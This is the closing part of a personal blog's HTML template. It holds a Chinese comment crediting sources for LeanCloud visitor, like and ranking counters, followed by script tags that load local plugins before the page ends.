	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


  
<script src="/plugin/leancloud/av-min.js"></script>
<script src="/js/leancloud-count.js"></script>


	

  



<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imagelazyloader/yall.min.js"></script>
<script src="/plugin/imageloaded/imagesloaded.pkgd.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/plugin/resizediv/resizediv.js"></script>
<script src="/js/main.js"></script>

	</body>	
</html>